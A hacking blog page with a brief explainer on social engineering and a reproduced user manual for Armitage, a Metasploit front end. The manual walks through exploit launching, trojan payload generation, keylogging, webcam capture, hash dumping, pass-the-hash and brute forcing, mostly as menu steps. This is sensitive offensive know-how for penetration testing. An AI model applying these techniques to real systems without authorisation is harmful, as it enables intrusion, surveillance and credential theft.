Toxic Cloud Hacking And Tricks

Social Engineering

2013-08-01T00:29:00.000-07:00

Social engineering is a term that describes a non-technical kind of intrusion that relies heavily on human interaction and often involves tricking other people to break normal security procedures.

A social engineer runs what used to be called a "con game." For example, a person using social engineering to break into a computer network might try to gain the confidence of an authorized user and get them to reveal information that compromises the network's security. Social engineers often rely on the natural helpfulness of people as well as on their weaknesses. They might, for example, call the authorized employee with some kind of urgent problem that requires immediate network access. Appeal to vanity, appeal to authority, appeal to greed, and old-fashioned eavesdropping are other typical social engineering techniques.

Social engineering is a component of many, if not most, types of exploits. Virus writers use social engineering tactics to persuade people to run malware-laden email attachments, phishers use social engineering to convince people to divulge sensitive information, ands careware vendors use social engineering to frighten people into running software that is useless at best and dangerous at worst.

Another aspect of social engineering relies on people's inability to keep up with a culture that relies heavily on information technology. Social engineers rely on the fact that people are not aware of the value of the information they possess and are careless about protecting it. Frequently, social engineers will search dumpsters for valuable information, memorize access codes by looking over someone's shoulder (shoulder surfing), or take advantage of people's natural inclination to choose passwords that are meaningful to them but can be easily guessed.

Security experts propose that as our culture becomes more dependent on information, social engineering will remain the greatest threat to any security system. Prevention includes educating people about the value of information, training them to protect it, and increasing people's awareness of how social engineers operate.

credit

Armitage

2013-07-29T05:59:00.000-07:00

I. Table of Contents

About ArmitageBefore we begin...
Getting StartedHow to get any woman to talk to you
User Interface TourSo many pretty screenshots
Host ManagementYou've got to find them to hack them.
ExploitationThis is the fun stuff
Post-ExploitationThis is the really fun stuff
ManeuverGetting around the network and on to more targets
Team MetasploitThis is cyber attack management!
Scripting ArmitageThe next step...

1. About Armitage

1.1 What is Armitage?

Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.

Through one Metasploit instance, your team will:

Use the same sessions
Share hosts, captured data, and downloaded files
Communicate through a shared event log.
Run bots to automate red team tasks.

Armitage is a force multiplier for red team operations.

1.2 Commercial Support

Armitage is open source software developed by Raphael Mudge's company Strategic Cyber LLC. Cobalt Strike is the commercially supported big brother of Armitage.

Cobalt Strike adds features to support professional penetration testers and red teams, including:

1.3 Cyber Attack Management

Armitage organizes Metasploit's capabilities around the hacking process. There are features for discovery, access, post-exploitation, and maneuver. This section describes these features at a high-level, the rest of this manual covers these capabilities in detail.

Armitage's dynamic workspaces let you define and switch between target criteria quickly. Use this to segment thousands of hosts into target sets. Armitage also launches scans and imports data from many security scanners. Armitage visualizes your current targets so you'll know the hosts you're working with and where you have sessions.

Armitage recommends exploits and will optionally run active checks to tell you which exploits will work. If these options fail, use the Hail Mary attack to unleash Armitage's smart automatic exploitation against your targets.

Once you're in, Armitage exposes post-exploitation tools built into the Meterpreter agent. With the click of a menu you will escalate your privileges, log keystrokes, dump password hashes, browse the file system, and use command shells.

Armitage makes it trivial to setup and use pivots. You'll use compromised hosts as a hop to attack your target's network from the inside. Armitage uses Metasploit's SOCKS proxy module to let you use external tools through your pivots. These features allow you to maneuver through the network.

The rest of this manual is organized around this process, providing what you need to know in the order you'll need it.

1.4 Necessary Vocabulary

To use Armitage, it helps to understand Metasploit. Here are a few things you must know:

Metasploit is a console driven application. Anything you do in Armitage is translated into a command Metasploit understands. You can bypass Armitage and type commands yourself (covered later). If you're lost in a console, typehelp and hit enter.

Metasploit presents its capabilities as modules. Every scanner, exploit, and payload is available as a module. To launch a module, you must set one or more options to configure the module. This process is uniform for all modules and Armitage makes this process easier for you.

When you exploit a host, you will have a session on that host. Armitage knows how to interact with shell and meterpreter sessions.

Meterpreter is an advanced agent that makes a lot of post-exploitation functionality available to you. Armitage is built to take advantage of Meterpreter. Working with Meterpreter is covered later.

The Metasploit Unleashed course maintained by the Offensive Security folks is excellent. I recommend reading it before going further.

2. Getting Started

2.1 Requirements

Armitage exists as a client and a server that allow red team collaboration to happen. The Armitage client package is made available for Windows, MacOS X, and Linux. Armitage does NOT require a local copy of the Metasploit Framework to connect to a team server.

These getting started instructions are written assuming that you would like to connect to a local instance of the Metasploit Framework.

Armitage requires the following:

Metasploit Framework and its dependencies.
- PostgreSQL Database
- Nmap
Oracle's Java 1.7

To quickly install all of the dependencies, you have a few options:

Use a Linux distribution for penetration testing such as Kali Linux or Pentoo Linux.
These distributions ship with Metasploit and its dependencies installed for you.

Use the MSF Installer Script created by DarkOperator.
This option will setup an environment that uses Git for updates.

Use the official installer provided by Rapid7.
This option will require you to register with Rapid7 to get updates.

2.2 Kali Linux

Kali Linux comes with the Metasploit Framework installed. This is a good option if you want to get up and running with Armitage quickly.

Setup Instructions (do these once!)

Open a terminal
Initialize the database: service metasploit start
Stop the metasploit service: service metasploit stop
Extract armitage: tar zxvf armitageDDMMYY.tgz

How to Start Armitage

Open a terminal
Start the PostgreSQL database: service postgres start
(this does not happen automatically in Kali Linux)
cd /path/to/armitage
./armitage

2.3 BackTrack Linux

BackTrack Linux is no longer a supported environment for Armitage. Please move over to Kali Linux.

If you want to continue to use BackTrack Linux, you must uninstall the Metasploit Framework and install the latest dependencies. Due to dependency changes (far outside of my control) in the framework, your BackTrack Linux environment will not work if you update Metasploit.

To uninstall the Metasploit Framework:

cd /opt/metasploit
./uninstall

2.4 Linux

Install the Metasploit Framework and its dependencies
Extract armitage
Change to the folder you installed armitage into
Use ./armitage to start Armitage

2.5 Windows

Install Rapid7's Metasploit Community Edition Installer
Extract armitage
Double-click the armitage.exe file to start Armitage (note: this .exe will fail with a 64-bit Java Runtime environment. Use java -jar armitage.jar in this case.)

2.6 Manual Setup

If you choose to setup the Metasploit Framework and its dependencies by hand, here are a few hard and fast requirements to help you:

You need a PostgreSQL database. No other database is supported.
msfrpcd must be in $PATH
$MSF_DATABASE_CONFIG must point to a YAML file
$MSF_DATABASE_CONFIG must be available to msfrpcd and armitage
the msgpack ruby gem is required

Take a look at the following resources for help in this area:

Darkoperator's MSF Installer Script (MacOS X, Ubuntu, and Debian)
Setting Up a Metasploit Development Environment
^-- these instructions point you to another set of instructions to setup the database. They're probably fine, but don't use the supplied YAML file. It uses a lot of YAML features that Armitage can't parse or understand. Use thesample I provide instead.

2.7 Updating Metasploit

When you run msfupdate, it's possible that you may break Armitage by doing this. The Metasploit team is cautious about what they commit to the primary git repository and they're extremely responsive to bug reports. That said, things still break from time to time. Sometimes the framework changes in a way that's not compatible until I update Armitage.

If you run msfupdate and Armitage stops working, you have a few options.

1) You can run msfupdate later and hope the issue gets fixed. Many times this is a valid strategy.

2) You can downgrade Metasploit to the last revision I tested it against. Take a look at the change log file for the latest development release tested against Armitage. The revision number is located next to the release date. To downgrade Metasploit:

cd /path/to/metasploit/msf3
source ../scripts/setenv.sh
git pull
git checkout [commit id]
bundle install

3) Reinstall Metasploit using the installer provided by Rapid7. The Metasploit installer includes the latest stable version of Metasploit. Usually, this release is very stable.

If you're preparing to use Armitage and Metasploit somewhere important--do not run msfupdate and assume it will work. It's very important to stick with what you know works or test the functionality you need to make sure it works. When in doubt, go with option (2) or (3).

2.8 Troubleshooting Help

If you're having trouble connecting Armitage to Metasploit, click the Help button to get troubleshooting advice. This button will take you to the Armitage Startup Troubleshooting Guide.

2.9 Quick Connect

If you'd like to quickly connect Armitage to a Metasploit server without filling in the setup dialog, use the --clientoption to specify a file with the connection details.

java -jar armitage.jar --client connect.prop

Here's an example connect.prop file:

host=192.168.95.241
port=55553
user=mister
pass=bojangles

If you have to manage multiple Armitage/Metasploit servers, consider creating a desktop shortcut that calls this --client option with a different properties file for each server.

3. User Interface Tour

3.1 Overview

The Armitage user interface has three main panels: modules, targets, and tabs. You may click the area between these panels to resize them to your liking.

3.2 Modules

The module browser lets you launch a Metasploit auxiliary module, throw an exploit, generate a payload, and run a post-exploitation module. Click through the tree to find the desired module. Double click the module to open a module launch dialog.

Armitage will configure the module to run against the selected hosts. This works for auxiliary modules, exploits, and post modules.

Running a module against multiple hosts is one of the big advantages of Armitage. In the Metasploit console, you must configure and launch an exploit and post modules for each host you're working with.

You can search modules too. Click in the search box below the tree, type a wildcard expression (e.g., ssh_*), and press enter. The module tree will show the search results, expanded for quick viewing. Clear the search box and press enter to restore the module browser to its original state.

3.3 Targets - Graph View

The targets panel shows your targets to you. Armitage represents each target as a computer with its IP address and other information about it below the computer. The computer screen shows the operating system the computer is running.

A red computer with electrical jolts indicates a compromised host.

A directional green line indicates a pivot from one host to another. Pivoting allows Metasploit to route attacks and scans through intermediate hosts. A bright green line indicates the pivot communication path is in use.

Click a host to select it. You may select multiple hosts by clicking and dragging a box over the desired hosts.

Right click a host to bring up a menu with available options. The attached menu will show attack and login options, menus for existing sessions, and options to edit the host information.

The login menu is only available after a port scan reveals open ports that Metasploit can use. The Attack menu is only available after finding attacks through the Attacks menu at the top of Armitage. Shell and Meterpreter menus show up when a shell or Meterpreter session exists on the selected host.

Several keyboard shortcuts are available in the targets panel. To edit these, go to Armitage -> Preferences.

Ctrl Plus - zoom in
Ctrl Minus - zoom out
Ctrl 0 - reset the zoom level
Ctrl A - select all hosts
Escape - clear selection
Ctrl C - arrange hosts into a circle
Ctrl S - arrange hosts into a stack
Ctrl H - arrange hosts into a hierarchy. This only works when a pivot is set up.
Ctrl P - export hosts into an image

Right click the targets area with no selected hosts to configure the layout and zoom-level of the targets area.

3.4 Targets - Table View

If you have a lot of hosts, the graph view becomes difficult to work with. For this situation Armitage has a table view. Go to Armitage -> Set Target View -> Table View to switch to this mode. Armitage will remember your preference.

Click any of the table headers to sort the hosts. Highlight a row and right-click it to bring up a menu with options for that host.

Armitage will bold the IP address of any host with sessions. If a pivot is in use, Armitage will make it bold as well.

3.5 Tabs

Armitage opens each dialog, console, and table in a tab below the module and target panels. Click the X button to close a tab.

You may right-click the X button to open a tab in a window, take a screenshot of a tab, or close all tabs with the same name.

Hold shift and click X to close all tabs with the same name. Hold shift + control and click X to open the tab in its own window.

You may drag and drop tabs to change their order.

Armitage provides several keyboard shortcuts to make your tab management experience as enjoyable as possible. Use Ctrl+T to take a screenshot of the active tab. Use Ctrl+D to close the active tab. Try Ctrl+Left and Ctrl+Right to quickly switch tabs. And Ctrl+W to open the current tab in its own window.

3.6 Consoles

Metasploit console, Meterpreter console, and shell interfaces each use a console tab. A console tab lets you interact with these interfaces through Armitage.

The console tab tracks your command history. Use the up arrow to cycle through previously typed commands. The down arrow moves back to the last command you typed.

In the Metasploit console, use the Tab key to complete commands and parameters. This works just like the Metasploit console outside of Armitage.

Use Ctrl Plus to make the console font size larger, Ctrl Minus to make it smaller, and Ctrl 0 to reset it. This change is local to the current console only. Visit Armitage -> Preferences to permanently change the font.

Press Ctrl F to show a panel that will let you search for text within the console.

Use Ctrl A to select all text in the console's buffer.

Armitage sends a use or a set PAYLOAD command if you click a module or a payload name in a console.

To open a Console go to View -> Console or press Ctrl+N.

On MacOS X and Windows, you must click in the editbox at the bottom of the console to type. Linux doesn't have this problem. Always remember, the best Armitage experience is on Linux.

The Armitage console uses color to draw your attention to some information. To disable the colors, set theconsole.show_colors.boolean preference to false. You may also edit the colors through Armitage -> Preferences. Here is the Armitage color palette and the preference associated with each color:

3.7 Logging

Armitage logs all console, shell, and event log output for you. Armitage organizes these logs by date and host. You'll find these logs in the ~/.armitage folder. Go to View -> Reporting -> Acitivity Logs to open this folder.

Armitage also saves copies of screenshots and webcam shots to this folder.

Change the armitage.log_everything.boolean preference key to false to disable this feature.

Edit the armitage.log_data_here.folder to set the folder where Armitage should log everything to.

3.8 Export Data

Armitage and Metasploit share a database to track your hosts, services, vulnerabilities, credentials, loots, and user-agent strings captured by browser exploit modules.

To get this data, go to View -> Reporting -> Export Data. This option will export data from Metasploit and create easily parsable XML and tab separated value (TSV) files.

4. Host Management

4.1 Host Management

Armitage displays hosts in the graph and table view. The host icon indicates the best guess about the operating system on the host at the time. This information is taken from the database.

To change the displayed operating system icon for a host, select the host, right-click, and navigate to Host -> Operating System. Choose the correct operating system for the host.

You may attach a label to your hosts too. Select the host, right-click and go to Host -> Set Label.... Labels are user-specified notes. Armitage stores labels in the database. Labels are visible in both the graph and table view. Labels are shown to all team members. Use labels to track small notes and coordinate actions.

To remove a host, select the host, right-click and go to Host -> Remove Host. This will remove the host from the database.

4.2 Dynamic Workspaces

Armitage's dynamic workspaces feature allows you to create views into the hosts database and quickly switch between them. Use Workspaces -> Manage to manage your dynamic workspaces. Here you may add, edit, and remove workspaces you create.

To create a new dynamic workspace, press Add. You will see the following dialog:

Give your dynamic workspace a name. It doesn't matter what you call it. This description is for you.

If you'd like to limit your workspace to hosts from a certain network, type a network description in the Hosts field. A network description might be: 10.10.0.0/16 to display hosts between 10.10.0.0-10.10.255.255. Separate multiple networks with a comma and a space.

You can cheat with the network descriptions a little. If you type: 192.168.95.0, Armitage will assume you mean 192.168.95.0-255. If you type: 192.168.0.0, Armitage will assume you mean 192.168.0.0-192.168.255.255.

Fill out the Ports field to include hosts with certain services. Separate multiple ports using a comma and a space.

Use the OS field to specify which operating system you'd like to see in this workspace. You may type a partial name, such as indows. Armitage will only include hosts whose OS name includes the partial name. This value is not case sensitive. Separate multiple operating systems with a comma and a space.

Use the Labels field to show hosts with the labels you specify. Armitage treats each word in a host label as a separate label. You may specify any of these labels here. For example, if host 10.10.10.3 has the label dc corp, a workspace defined to show dc or corp labels will include this host. Separate each label with a comma and a space.

Select Hosts with sessions only to only include hosts with sessions in this dynamic workspace.

You may specify any combination of these items when you create your dynamic workspace.

Each workspace will have an item in the Workspaces menu. Use these menu items to switch between workspaces. You may also use Ctrl+1 through Ctrl+9 to switch between your first nine workspaces.

Use Workspaces -> Show All or Ctrl+Backspace to display the entire database.

Armitage will only display 512 hosts at any given time, no matter how many hosts are in the database. If you have thousands of hosts, use this feature to segment your hosts into useful target sets.

4.3 Importing Hosts

To add host information to Metasploit, you may import it. The Hosts -> Import Hosts menu accepts the following files:

Acunetix XML
Amap Log
Amap Log -m
Appscan XML
Burp Session XML
Foundstone XML
IP360 ASPL
IP360 XML v3
Microsoft Baseline Security Analyzer
Nessus NBE
Nessus XML (v1 and v2)
NetSparker XML
NeXpose Simple XML
NeXpose XML Report
Nmap XML
OpenVAS Report
Qualys Asset XML
Qualys Scan XML
Retina XML

You may manually add hosts with Hosts -> Add Hosts...

4.4 Nmap Scans

You may also launch an Nmap scan from Armitage and automatically import the results into Metasploit. The Hosts ->Nmap Scan menu has several scanning options.

Optionally, you may type db_Nmap in a console to launch Nmap with the options you choose.

Nmap scans do not use the pivots you have set up.

4.5 MSF Scans

Armitage bundles several Metasploit scans into one feature called MSF Scans. This feature will scan for a handful of open ports. It then enumerates several common services using Metasploit auxiliary modules built for the purpose.

Highlight one or more hosts, right-click, and click Scan to launch this feature. You may also go to Hosts -> MSF Scansto launch these as well.

These scans work through a pivot and against IPv6 hosts as well. These scans do not attempt to discover if a host is alive before scanning. To save time, you should do host discovery first (e.g., an ARP scan, ping sweep, or DNS enumeration) and then launch these scans to enumerate the discovered hosts.

4.6 DNS Enumeration

Another host discovery option is to enumerate a DNS server. Go to Hosts -> DNS Enum to do this. Armitage will present a module launcher dialog with several options. You will need to set the DOMAIN option to the domain you want to enumerate. You may also want to set NS to the IP address of the DNS server you're enumerating.

If you're attacking an IPv6 network, DNS enumeration is one option to discover the IPv6 hosts on the network.

4.7 Database Maintenance

Metasploit logs everything you do to a database. Over time your database will become full of stuff. If you have a performance problem with Armitage, try clearing your database. To do this, go to Hosts -> Clear Database.

5. Exploitation

5.1 Remote Exploits

Before you can attack, you must choose your weapon. Armitage makes this process easy. Use Attacks -> Find Attacksto generate a custom Attack menu for each host.

To exploit a host: right-click it, navigate to Attack, and choose an exploit. To show the right attacks, make sure the operating system is set for the host.

The Attack menu limits itself to exploits that meet a minimum exploit rank of great. Some useful exploits are rankedgood and they won't show in the attack menu. You can launch these using the module browser.

Use Armitage -> Set Exploit Rank to change the minimum exploit rank.

Optionally, if you'd like to see hosts that are vulnerable to a certain exploit, browse to the exploit in the module browser. Right-click the module. Select Relevant Targets. Armitage will create a dynamic workspace that shows hosts that match the highlighted exploit. Highlight all of the hosts and double-click the exploit module to attack all of them at once.

5.2 Which exploit?

Learning which exploits to use and when comes with experience. Some exploits in Metasploit implement a check function. These check functions connect to a host and check if the exploit applies. Armitage can use these check functions to help you choose the right exploit when there are many options. For example, targets listening on port 80 will show several web application exploits after you use Find Attacks. Click the Check exploits... menu to run the check command against each of these. Once all the checks are complete, press Ctrl F and search for vulnerable. This will lead you to the right exploit.

Clicking a host and selecting Services is another way to find an exploit. If you have Nmap scan results, look at the information field and guess which server software is in use. Use the module browser to search for any Metasploit modules related to that software. One module may help you find information required by another exploit. Apache Tomcat is an example of this. The tomcat_mgr_login module will search for a username and password that you can use. Once you have this, you can launch the tomcat_mgr_deploy exploit to get a shell on the host.

5.3 Launching Exploits

Armitage uses this dialog to launch exploits:

The exploit launch dialog lets you configure options for a module and choose whether to use a reverse connect payload.

Armitage presents options in a table. Double click the value to edit it. If an option requires a filename, double click the option to open up a file chooser dialog. You may also check Show advanced options to view and set advanced options.

If you see SOMETHING ✚ in a table, this means you can double-click that item to launch a dialog to help you configure its value. This convention applies to the module launcher and preferences dialogs.

Some penetration testers organize their targets into text files to make them easier to track. Armitage can make use of these files too. Double-click RHOST ✚ and select your targets file. The file must contain one IP address per line. This is an easy way to launch an attack or action against all of those hosts.

For remote exploits, Armitage chooses your payload for you. Generally, Armitage will use Meterpreter for Windows targets and a command shell payload for UNIX targets.

Click Launch to run the exploit. If the exploit is successful, Armitage will make the host red and surround it with lightning bolts. Metasploit will also print a message to any open consoles.

5.4 Automatic Exploitation

If manual exploitation fails, you have the hail mary option. Attacks -> Hail Mary launches this feature. Armitage's Hail Mary feature is a smart db_autopwn. It finds exploits relevant to your targets, filters the exploits using known information, and then sorts them into an optimal order.

This feature won't find every possible shell, but it's a good option if you don't know what else to try.

5.5 Client-side Exploits

Through Armitage, you may use Metasploit's client-side exploits. A client-side attack is one that attacks an application and not a remote service. If you can't get a remote exploit to work, you'll have to use a client-side attack.

Use the module browser to find and launch client-side exploits. Search for fileformat to find exploits that trigger when a user opens a malicious file. Search for browser to find exploits that server browser attacks from a web server built into Metasploit.

5.6 Client-side Exploits and Payloads

If you launch an individual client-side exploit, you have the option of customizing the payload that goes with it. Armitage picks sane defaults for you.

In a penetration test, it's usually easy to get someone to run your evil package. The hard part is to get past network devices that limit outgoing traffic. For these situations, it helps to know about meterpreter's payload communication options. There are payloads that speak HTTP, HTTPS, and even communicate to IPv6 hosts. These payloads give you options in a tough egress situation.

To set the payload, double-click PAYLOAD in the option column of the module launcher. This will open a dialog asking you to choose a payload.

Highlight a payload and click Select. Armitage will update the PAYLOAD, DisablePayloadHandler, ExitOnSession,LHOST, and LPORT values for you. You're welcome to edit these values as you see fit.

If you select the Start a handler for this payload option, Armitage will set the payload options to launch a payload handler when the exploit launches. If you did not select this value, you're responsible for setting up a multi/handler for the payload.

5.7 Payload Handlers

A payload handler is a server that runs in Metasploit. Its job is to wait for a payload to connect to your Metasploit and establish a session.

To quickly start a payload handler, navigate to Armitage -> Listeners. A bind listener attempts to connect to a payload listening for a connection. A reverse listener waits for the payload to connect back to you.

You may set up shell listeners to receive connections from netcat.

Go to View -> Jobs to see which handlers are running.

5.8 Generate a Payload

Exploits are great, but don't ignore the simple stuff. If you can get a target to run a program, then all you need is an executable. Armitage can generate an executable from any of Metasploit's payloads. Choose a payload in the module browser, double click it, select the type of output, and set your options. Once you click launch, a save dialog will ask you where to save the file to.

To create a Windows trojan binary, set the output type to exe. Set the Template option to a Windows executable. Set KeepTemplateWorking if you'd like the template executable to continue to work as normal. Make sure you test the resulting binary. Some template executables will not yield a working executable.

Remember, if you have a payload, it needs a handler. Use the multi/handler output type to create a handler that waits for the payload to connect. This option offers more flexibility and payload options than the Armitage -> Listeners menu.

If you plan to start a handler and then generate a payload, here's a tip that will save you some time. First, configure a multi/handler as described. Hold down Shift when you click Launch. This will tell Armitage to keep the module launch dialog open. Once your handler is started, change the output type to the desired value, and click Launch again. This will generate the payload with the same values used to create the multi/handler.

6. Post Exploitation

6.1 Managing Sessions

Armitage makes it easy to manage the meterpreter agent once you successfully exploit a host. Hosts running a meterpreter payload will have a Meterpreter N menu for each Meterpreter session.

If you have shell access to a host, you will see a Shell N menu for each shell session. Right click the host to access this menu. If you have a Windows shell session, you may go to Shell N -> Meterpreter... to upgrade the session to a Meterpreter session. If you have a UNIX shell, go to Shell N -> Upload to upload a file using the UNIX printf command.

You may also press Ctrl+I to select a session to interact with.

6.2 Privilege Escalation

Some exploits result in administrative access to the host. Other times, you need to escalate privileges yourself. To do this, use the Meterpreter N -> Access -> Escalate Privileges menu. This will highlight the privilege escalation modules in the module browser.

Try the getsystem post module against Windows XP/2003 era hosts.

6.3 Token Stealing

Another privilege escalation option is token stealing. When a user logs onto a Windows host, a token is generated and acts like a temporary cookie to save the user the trouble of retyping their password when they try to access different resources. Tokens persist until a reboot. You may steal these tokens to assume the rights of that user.

To see which tokens are available to you, go to Meterpreter N -> Access -> Steal Token. Armitage will present a list of tokens to you. Click Steal Token to steal one.

If you want to revert to your original token, press Revert to Self. The Get UID button shows your current user id.

6.4 Session Passing

Once you exploit a host, duplicating your access should be a first priority. Meterpreter N -> Access -> Pass Session will inject meterpreter into memory and execute it for you. By default this option is configured to call back to Armitage's default Meterpreter listener. Just click Launch.

You may also use Pass Session to send meterpreter to a friend. Set LPORT and LHOST to the values of their Meterpreter multi/handler.

If your friend uses Armitage, have them type set in a Console tab and report the LHOST and LPORT values to you. These are the values for their default Meterpreter listener.

6.5 File Browser

Meterpreter gives you several options for exploring a host once you've exploited it. One of them is the file browser. This tool will let you upload, download, and delete files. Visit Meterpreter N -> Explore -> Browse Files to access the File Browser.

Right-click a file to download or delete it. If you want to delete a directory, make sure it's empty first.

You may download entire folders or individual files. Go to View -> Downloads to access your downloaded files.

If you have system privileges, you may modify the file timestamps using the File Browser. Right-click a file or directory and go to the Timestomp menu. This features works like a clipboard. Use Get MACE Values to capture the timestamps of the current file. Right-click another file and use Set MACE Values to update the timestamps of that file.

6.6 Command Shell

You can reach a command shell for a host through Meterpreter N -> Interact -> Command Shell. The Meterpreter shell is also available under the same parent menu.

Navigating to the Meterpreter N menu for each action gets old fast. Right-click inside the Meterpreter shell window to see the Meterpreter N menu items right away.

Close the command shell tab to kill the process associated with the command shell.

6.7 VNC

To interact with a desktop on a target host, go to Meterpreter N -> Interact -> Desktop (VNC). This will stage a VNC server into the memory of the current process and tunnel the connection through Meterpreter. Armitage will provide you the details to connect a local VNC client to your target.

6.8 Screenshots and Webcam Spying

To grab a screenshot use Meterpreter N -> Explore -> Screenshot. There is a Webcam Shot option in the same location. This option snaps a frame from the user's webcam.

Right-click a screenshot or webcam shot image to change the zoom for the tab. This zoom preference will stay, even if you refresh the image. Click Refresh to update the screenshot or grab another frame from the webcam. Click Watch (10s) to automatically snap a picture every ten seconds.

6.9 Process Management and Key Logging

Go to Meterpreter N -> Explore -> Show Processes to see a list of processes on your victim. Use Kill to kill the highlighted processes.

Meterpreter runs in memory. It's possible to move Meterpreter from one process to another. This is called migration. Highlight a process and click Migrate to migrate to another process. Your session will have the permissions of that process.

While in a process, it's also possible to see keystrokes from the vantage point of that process. Highlight a process and click Log Keystrokes to launch a module that migrates meterpreter and starts capturing keystrokes. If you key log from explorer.exe you will see all of the keys the user types on their desktop.

If you choose to migrate a process for the purpose of key logging, you should duplicate your session first. If the process Meterpreter lives in closes, your session will go away.

6.10 Post-exploitation Modules

Metasploit has several post-exploitation modules too. Navigate the post branch in the module browser. Double-click a module and Armitage will show a launch dialog. Armitage will populate the module's SESSION variable if a compromised host is highlighted. Each post-exploitation module will execute in its own tab and present its output to you there.

To find out which post-modules apply for a session: right-click a compromised host and navigate to Meterpreter N ->Explore -> Post Modules or Shell N -> Post Modules. Clicking this menu item will show all applicable post-modules in the module browser.

Metasploit saves post-exploitation data into a Loot database. To view this data go to View -> Loot.

You may highlight multiple hosts and Armitage will attempt to run the selected post module against all of them. Armitage will open a new tab for the post module output of each session. This may lead to a lot of tabs. Hold down shift and clickX on one of the tabs to close all tabs with the same name.

7. Maneuver

7.1 Pivoting

Metasploit can launch attacks from a compromised host and receive sessions on the same host. This ability is called pivoting.

To create a pivot, go to Meterpreter N -> Pivoting -> Setup.... A dialog will ask you to choose which subnet you want to pivot through the session.

Once you've set up pivoting, Armitage will draw a green line from the pivot host to all targets reachable by the pivot you created. The line will become bright green when the pivot is in use.

To use a pivot host for a reverse connection, set the LHOST option in the exploit launch dialog to the IP address of the pivot host.

7.2 Scanning and External Tools

Once you have access a host, it's good to explore and see what else is on the same network. If you've set up pivoting, Metasploit will tunnel TCP connections to eligible hosts through the pivot host. These connections must come from Metasploit.

To find hosts on the same network as a compromised host, right-click the compromised host and go to Meterpreter N -> ARP Scan or Ping Sweep. This will show you which hosts are alive. Highlight the hosts that appear, right-click, and select Scan to scan these hosts using Armitage's MSF Scan feature. These scans will honor the pivot you set up.

External tools (e.g., Nmap) will not use the pivots you've set up. You may use your pivots with external tools through a SOCKS proxy though. Go to Armitage -> SOCKS Proxy... to launch the SOCKS proxy server.

The SOCKS4 proxy server is one of the most useful features in Metasploit. Launch this option and you can set up your web browser to connect to websites through Metasploit. This allows you to browse internal sites on a network like you're local. You may also configure proxychains on Linux to use almost any program through a proxy pivot.

7.3 Password Hashes

To collect Windows password hashes, visit Meterpreter N -> Access -> Dump Hashes. You need administrative privileges to do this.

There are two hash dumping options. One is the lsass method and the other is the registry method. The lsass method attempts to grab the password hashes from memory. This option works well against Windows XP/2003 era hosts. The registry method works well against modern Windows systems.

You may view collected hashes through View -> Credentials. For your cracking pleasure, the Export button in this tab will export credentials in pwdump format. You may also use the Crack Passwords button to run John the Ripper against the hashes in the credentials database.

7.4 Pass-the-Hash

When you login to a Windows host, your password is hashed and compared to a stored hash of your password. If they match, you're in. When you attempt to access a resource on the same Windows domain, the stored hash is sent to the other host and used to authenticate you. With access to these hashes, you can use this mechanism to take over other hosts on the same domain. This is called a pass-the-hash attack.

Use Login -> psexec to attempt a pass-the-hash attack against another Windows host. Click Check all Credentials to have Armitage try all hashes and credentials against the host.

The pass-the-hash attack attempts to upload a file and create a service that immediately runs. Only administrator users can do this. Further, your targets must be on the same active directory domain for this attack to work.

7.5 Using Credentials

Armitage will create a Login menu on each host with known services. Right-click a host and navigate to Login ->service. This will open a dialog where you may choose a username and password from the credentials known to Metasploit.

Some services (e.g., telnet and ssh) will give you a session when a login succeeds. Others will not.

Check the Try all credentials option and Metasploit will login to the service with each of the known credentials. Metasploit automatically adds each successful login to the credentials table for you.

The best way into a network is through valid credentials. Remember that a successful username/password combination from one service may give you access to another host that you couldn't exploit.

7.6 Password Brute Force

Metasploit can attempt to guess a username and password for a service for you. This capability is easy to use through the module browser.

Metasploit supports brute forcing through the auxiliary modules named service_login. Type login in the module browser to search for them.

To brute force a username and password over SSH, browse to auxiliary/scanner/ssh/ssh_login in the modules panel and double click it.

If you know the username, set the USERNAME variable. If you'd like Metasploit to brute force the username, select a value for USER_FILE. Double click the USER_FILE variable to bring up a file chooser where you can select a text file containing a list of usernames.

Metasploit has many files related to brute forcing in the [metasploit install]/data/wordlists directory.

Set the PASS_FILE variable to a text file containing a list of passwords to try.

If you're only brute forcing one host and you have a lot of usernames/passwords to try, I recommend using an external tool like Hydra. Metasploit does not make several parallel connections to a single host to speed up the process. This lesson can be taken one step further--use the right tool for each job.

8. Team Metasploit

8.1 Remote Connections

You can use Armitage to connect to an existing Metasploit instance on another host. Working with a remote Metasploit instance is similar to working with a local instance. Some Armitage features require read and write access to local files to work. Armitage's team server adds these features and makes it possible for Armitage clients to use Metaspoit remotely.

Connecting to a remote Metasploit requires starting a Metasploit RPC server and Armitage's team server server.

8.2 Multi-Player Metasploit Setup

The Armitage Linux package comes with a teamserver script that you may use to start Metasploit's RPC daemon and Armitage's team server with one command. To run it:

cd /path/to/armitage
./teamserver [external IP address] [password]

This script assumes armitage.jar is in the current folder. Make sure the external IP address is correct (Armitage doesn't check it) and that your team can reach port 55553 on your attack host. That's it.

Metasploit's RPC daemon and the Armitage team server are not GUI programs. You may run these over SSH.

The Armitage team server communicates over SSL. When you start the team server, it will present a server fingerprint. This is a SHA-1 hash of the server's SSL certificate. When your team members connect, Armitage will present the hash of the certificate the server presented to them. They should verify that these hashes match.

Do not connect to 127.0.0.1 when a teamserver is running. Armitage uses the IP address you're connecting to determine whether it should use SSL (teamserver, remote address) or non-SSL (msfrpcd, localhost). You may connect Armitage to your teamserver locally, use the [external IP address] in the Host field.

Armitage's red team collaboration setup is CPU sensitive and it likes RAM. Make sure you have 1.5GB of RAM in your team server.

8.3 Multi-Player Metasploit

Armitage's red team collaboration mode adds a few new features. These are described here:

View -> Event Log opens a shared event log. You may type into this log and communicate as if you're using an IRC chat room. In a penetration test this event log will help you reconstruct major events.

Multiple users may use any Meterpreter session at the same time. Each user may open one or more command shells, browse files, and take screenshots of the compromised host.

Metasploit shell sessions are automatically locked and unlocked when in use. If another user is interacting with a shell, Armitage will warn you that it's in use.

Some Metasploit modules require you to specify one or more files. If a file option has a ✚ next to it, then you may double-click that option name to choose a local file to use. Armitage will upload the chosen local file and set the option to its remote location for you. Generally, Armitage will do its best to move files between you and the shared Metasploit server to create the illusion that you're using Metasploit locally.

Penetration testers will find this feature invaluable. Imagine you're working on a pen test and come across a system you don't know much about. You can reach back to your company and ask your local expert to load Armitage and connect to the same Metasploit instance. They will immediately have access to your scan data and they can interact with your existing sessions... seamlessly.

Or, imagine that you're simulating a phishing attack and you get access to a host. Your whole team can now work on the same host. One person can search for data, another can set up a pivot and search for internal hosts to attack, and another can work on persistence. The sky is the limit here.

